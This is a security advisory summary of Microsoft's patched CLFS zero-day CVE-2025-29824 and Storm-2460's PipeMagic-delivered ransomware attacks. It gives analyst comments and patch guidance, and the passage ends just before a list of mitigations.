Summary:
Microsoft has recently patched a zero-day vulnerability, identified as CVE-2025-29824, which impacts the Windows Common Log File System (CLFS) that was actively exploited in a small number of targeted ransomware attacks. These attacks, tracked under the threat cluster Storm-2460, primarily affected organizations in the IT and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia. Exploiting this privilege escalation flaw in CLFS allowed attackers to gain SYSTEM privileges.

The threat actors utilized a plugin-based trojan called PipeMagic, first observed in 2022 and delivered via a malicious MSBuild file, to deploy both the exploit and ransomware payloads. While the initial access vector remains unknown, the attackers were observed using the certutil utility to download malware from a compromised legitimate third-party site. Notably, this is the second Windows zero-day vulnerability delivered via PipeMagic, following CVE-2025-24983. PipeMagic has also been observed being used in Nokoyawa ransomware attacks that leveraged another CLFS zero-day, CVE-2023-28252. Successful exploitation of CVE-2025-29824 involves memory corruption and the utilization of the RtlSetAllBits API to elevate privileges and allow for process injection into SYSTEM processes, followed swiftly by credential extraction and file encryption. Although Microsoft could not obtain a ransomware sample, the ransom note contained a TOR domain linked to the RansomEXX ransomware family. Windows 11, version 24H2, is unaffected by this specific exploit.

Security Officer Comments:
The targeting of specific sectors across different geographical regions indicates a potentially sophisticated and targeted campaign. The connection to the RansomEXX ransomware family suggests that Storm-2460 has financially motivated objectives. The ineffectiveness of this particular exploit against the latest version of Windows (11 version 24H2) symbolizes the security benefits of keeping systems updated. Organizations should prioritize applying the Microsoft Patch Tuesday update to mitigate the risk associated with CVE-2025-29824 and remain vigilant for any suspicious activity indicative of PipeMagic or similar malware. The continued use of CLFS zero-days in ransomware attacks warrants further attention from defenders.

Suggested Corrections:
IOCs are available here.

Microsoft released security updates to address CVE 2025-29824 on April 8, 2025. Customers running Windows 11, version 24H2 are not affected by the observed exploitation, even if the vulnerability was present. Microsoft urges customers to apply these updates as soon as possible.

Microsoft recommends the following mitigations to reduce the impact of activity associated with Storm-2460: